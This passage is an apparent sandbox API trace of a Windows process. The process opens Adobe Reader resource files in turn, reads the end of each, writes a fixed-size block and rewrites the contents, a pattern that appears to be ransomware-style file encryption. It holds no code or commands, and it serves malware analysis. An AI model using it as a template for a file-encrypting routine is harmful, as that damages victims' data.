WriteFile (in: hFile=0x204, lpBuffer=0x2866c88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0116.708] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0116.708] WriteFile (in: hFile=0x204, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0116.709] CloseHandle (hObject=0x204) returned 1 [0116.709] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rum124.lex" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\rum124.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0116.710] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0116.710] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x9d800 [0116.710] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0116.710] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0116.710] ReleaseMutex (hMutex=0x168) returned 1 [0116.710] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rum124.lex", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0116.710] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rum124.lex", cchWideChar=10, lpMultiByteStr=0x1f735ec, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rum124.lex", lpUsedDefaultChar=0x0) returned 10 [0116.711] ReadFile (in: hFile=0x204, lpBuffer=0x289f978, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x289f978*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0116.759] ReadFile (in: hFile=0x204, lpBuffer=0x289f978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x289f978*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0117.541] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x9c800 [0117.541] ReadFile (in: hFile=0x204, lpBuffer=0x1e943a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0117.599] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x9c800 [0117.600] WriteFile (in: hFile=0x204, lpBuffer=0x288ade8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0117.600] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0117.600] WriteFile (in: hFile=0x204, lpBuffer=0x28a79a8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x28a79a8*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0117.601] WriteFile (in: hFile=0x204, lpBuffer=0x28a79a8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x28a79a8*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0117.601] CloseHandle (hObject=0x204) returned 1 [0117.601] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\sgr.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\sgr.hyp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0117.602] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0117.602] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xc400 [0117.602] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0117.602] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0117.602] ReleaseMutex (hMutex=0x168) returned 1 [0117.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sgr.hyp", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0117.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sgr.hyp", cchWideChar=7, lpMultiByteStr=0x1f7ac9c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sgr.hyp", lpUsedDefaultChar=0x0) returned 7 [0117.602] ReadFile (in: hFile=0x204, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0117.628] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xb400 [0117.628] ReadFile (in: hFile=0x204, lpBuffer=0x1e963d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e963d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0117.644] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xb400 [0117.645] WriteFile (in: hFile=0x204, lpBuffer=0x1ea8bb8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea8bb8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0117.645] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0117.645] WriteFile (in: hFile=0x204, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0117.645] CloseHandle (hObject=0x204) returned 1 [0117.645] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slv.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\slv.hyp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0117.646] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0117.646] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x1400 [0117.646] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0117.646] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0117.646] ReleaseMutex (hMutex=0x168) returned 1 [0117.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="slv.hyp", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0117.647] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="slv.hyp", cchWideChar=7, lpMultiByteStr=0x1f7ac9c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="slv.hyp", lpUsedDefaultChar=0x0) returned 7 [0117.647] ReadFile (in: hFile=0x204, lpBuffer=0x1ea8bb8, nNumberOfBytesToRead=0x1400, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea8bb8*, lpNumberOfBytesRead=0x359f2bc*=0x1400, lpOverlapped=0x0) returned 1 [0117.767] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0117.767] WriteFile (in: hFile=0x204, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1988, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x359f2d0*=0x1988, lpOverlapped=0x0) returned 1 [0117.768] CloseHandle (hObject=0x204) returned 1 [0117.768] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\spn62.ths" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\spn62.ths"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0117.769] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0117.769] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x84800 [0117.769] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0117.769] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0117.769] ReleaseMutex (hMutex=0x168) returned 1 [0117.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="spn62.ths", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0117.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="spn62.ths", cchWideChar=9, lpMultiByteStr=0x1f7344c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spn62.ths", lpUsedDefaultChar=0x0) returned 9 [0117.770] ReadFile (in: hFile=0x204, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0117.793] ReadFile (in: hFile=0x204, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0117.817] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x83800 [0117.817] ReadFile (in: hFile=0x204, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0117.841] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x83800 [0117.841] WriteFile (in: hFile=0x204, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0117.842] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0117.842] WriteFile (in: hFile=0x204, lpBuffer=0x289f978*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x289f978*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0117.842] WriteFile (in: hFile=0x204, lpBuffer=0x289f978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x289f978*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0117.842] CloseHandle (hObject=0x204) returned 1 [0117.842] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\tur111.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\tur111.hsp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0117.843] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0117.844] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x72b36 [0117.844] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0117.844] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0117.844] ReleaseMutex (hMutex=0x168) returned 1 [0117.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tur111.hsp", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0117.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tur111.hsp", cchWideChar=10, lpMultiByteStr=0x1f7356c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tur111.hsp", lpUsedDefaultChar=0x0) returned 10 [0117.844] ReadFile (in: hFile=0x204, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x359f278*=0x8000, lpOverlapped=0x0) returned 1 [0117.869] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x71b36 [0117.869] ReadFile (in: hFile=0x204, lpBuffer=0x2668268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0117.875] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x71b36 [0117.876] WriteFile (in: hFile=0x204, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0117.877] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0117.877] WriteFile (in: hFile=0x204, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x359f28c*=0x8000, lpOverlapped=0x0) returned 1 [0117.877] CloseHandle (hObject=0x204) returned 1 [0117.877] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\ICU\\icudt26l.dat" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\icu\\icudt26l.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0117.878] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0117.878] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x345f0 [0117.879] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0117.879] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0117.879] ReleaseMutex (hMutex=0x168) returned 1 [0117.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="icudt26l.dat", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="icudt26l.dat", cchWideChar=12, lpMultiByteStr=0x1f7344c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icudt26l.dat", lpUsedDefaultChar=0x0) returned 12 [0117.879] ReadFile (in: hFile=0x204, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x359f278*=0x8000, lpOverlapped=0x0) returned 1 [0117.904] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x335f0 [0117.904] ReadFile (in: hFile=0x204, lpBuffer=0x1ea7b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea7b88*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0117.945] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x335f0 [0117.946] WriteFile (in: hFile=0x204, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0117.946] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0117.946] WriteFile (in: hFile=0x204, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x359f28c*=0x8000, lpOverlapped=0x0) returned 1 [0117.947] CloseHandle (hObject=0x204) returned 1 [0117.947] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CENTEURO.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\centeuro.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0117.948] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0117.948] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x3294 [0117.948] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0117.948] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0117.948] ReleaseMutex (hMutex=0x168) returned 1 [0117.948] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CENTEURO.TXT", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.948] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CENTEURO.TXT", cchWideChar=12, lpMultiByteStr=0x1f7352c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CENTEURO.TXT", lpUsedDefaultChar=0x0) returned 12 [0117.948] ReadFile (in: hFile=0x204, lpBuffer=0x1ea7b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea7b88*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0117.951] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x2294 [0117.951] ReadFile (in: hFile=0x204, lpBuffer=0x1ea7b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea7b88*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0117.952] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x2294 [0117.952] WriteFile (in: hFile=0x204, lpBuffer=0x2693be8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2693be8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0117.953] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0117.953] WriteFile (in: hFile=0x204, lpBuffer=0x1ea7b88*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea7b88*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0117.953] CloseHandle (hObject=0x204) returned 1 [0117.954] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\HEBREW.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\hebrew.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0117.955] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0117.955] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x5d43 [0117.955] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0117.955] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0117.955] ReleaseMutex (hMutex=0x168) returned 1 [0117.955] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HEBREW.TXT", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0117.955] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HEBREW.TXT", cchWideChar=10, lpMultiByteStr=0x1f7344c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HEBREW.TXT", lpUsedDefaultChar=0x0) returned 10 [0117.955] ReadFile (in: hFile=0x204, lpBuffer=0x1ea7b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, 